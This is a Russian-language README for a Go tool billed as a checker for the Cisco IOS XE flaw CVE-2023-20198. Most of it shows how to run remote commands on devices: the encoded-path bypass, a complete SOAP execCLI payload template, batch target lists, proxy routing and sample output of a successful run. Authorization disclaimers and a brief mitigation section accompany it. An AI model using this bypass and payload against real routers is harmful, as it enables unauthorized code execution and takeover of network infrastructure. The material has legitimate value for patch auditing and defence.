
Сканер уязвимостей на Go для обнаружения CVE-2023-20198 на устройствах Cisco IOS XE. Тестирует интерфейсы SOAP/XML (WSMA) на удаленное выполнение кода с пакетным сканированием и генерацией HTML-отчетов.
Профессиональный сканер уязвимостей для обнаружения CVE-2023-20198 на устройствах Cisco IOS XE. Проверяет уязвимые интерфейсы SOAP/XML (WSMA). Предназначен для авторизованных оценок безопасности и аудита сети.
ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ
Этот инструмент предназначен исключительно для:
Несанкционированный доступ к компьютерным системам НЕЗАКОНЕН. Всегда убедитесь, что у вас есть соответствующие разрешения перед тестированием любых систем.
go install (рекомендуется)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
Бинарный файл будет установлен в каталог $GOPATH/bin (обычно ~/go/bin).
# Клонирование репозитория
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# Сборка
go build -o cisco-cve-2023-20198-checker
# Установка (опционально)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# Проверка одной цели
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Проверка нескольких целей
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# Генерация HTML-отчёта
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
Идеально подходит для корпоративных сред! Поддерживает:
# HTTP прокси
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (SSH-туннель)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Переменная окружения
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
Подробную настройку прокси см. в PROXY_GUIDE.md.
| Флаг | Тип | По умолчанию | Описание |
|---|---|---|---|
-target | string | - | IP-адрес/имя хоста одной цели |
-targets-file | string | - | Файл с целями (по одной на строку) |
-port | int | 443 | Порт HTTPS/SOAP |
-username | string | admin | Имя пользователя SOAP |
-password | string | - | Обязательно. Пароль SOAP |
-command | string | uname -a | Команда для выполнения |
-html | bool | false | Генерация HTML-отчёта |
-timeout | int | 10 | Таймаут запроса (секунды) |
-skip-verify | bool | true | Пропуск проверки SSL |
-proxy | string | - | URL прокси (http://, https://, socks5://) |
# Базовая проверка уязвимости
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Нестандартный порт
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# Выполнение конкретной команды
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Генерация отчёта
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# Создание файла с целями
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# Тестирование всех целей
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# Пакет с HTML-отчётом
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# Сетевая инвентаризация
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# Определение версии
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Через HTTP прокси
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# Через SOCKS5 прокси (SSH-туннель)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Аутентифицированный прокси
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
CVE ID: CVE-2023-20198
Оценка CVSS: 10.0 (Критическая)
Тип: Удалённое выполнение кода (RCE)
Затрагиваемые продукты: Web UI Cisco IOS XE (WSMA)
/%2577ebui_wsma_https (обход кодировки пути)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
Если ваши устройства уязвимы:
1. Отключите WSMA (если не требуется)
no ip http server
no ip http secure-server
2. Ограничьте доступ с помощью ACL
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. Обновите прошивку — Примените последние патчи безопасности Cisco
4. Включите строгую аутентификацию
aaa new-model
aaa authentication login default group tacacs+ local
5. Мониторинг логов — Отслеживайте подозрительную SOAP/HTTP активность
# Стандартная сборка
go build -o cisco-cve-2023-20198-checker
# Оптимизированная (меньший бинарник)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# Кросс-компиляция для разных платформ
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1
╔═══════════════════════════════════════════════════════════╗
║ Cisco SOAP/XML Security Checker ║
║ Educational & Authorized Security Assessment Only ║
╚═══════════════════════════════════════════════════════════╝
[*] Command: show version
[*] Port: 443
[*] Timeout: 10 seconds
[1/1] Testing target: 192.168.1.100:443
[*] Sending SOAP request...
[+] Response received (Status: 200)
[+] Success!
╔═══════════════════════════════════════════════════════════╗
║ BATCH RESULTS ║
╚═══════════════════════════════════════════════════════════╝
[✓] 192.168.1.100:443 - SUCCESS
Cisco IOS XE Software, Version 16.09.04...
╔═══════════════════════════════════════════════════════════╗
║ SUMMARY ║
╚═══════════════════════════════════════════════════════════╝
Total Targets: 1
Successful: 1
Failed: 0
Профессиональный отчёт об оценке безопасности, содержащий:
Приветствуются любые вклады! Пожалуйста:
Лицензия MIT — см. файл LICENSE
Этот инструмент предназначен только для авторизованного сканирования уязвимостей. Авторы не несут ответственности за неправильное использование. Всегда получайте письменное разрешение перед тестированием систем, которые вам не принадлежат.
Сделано для сообщества специалистов по безопасности 🛡️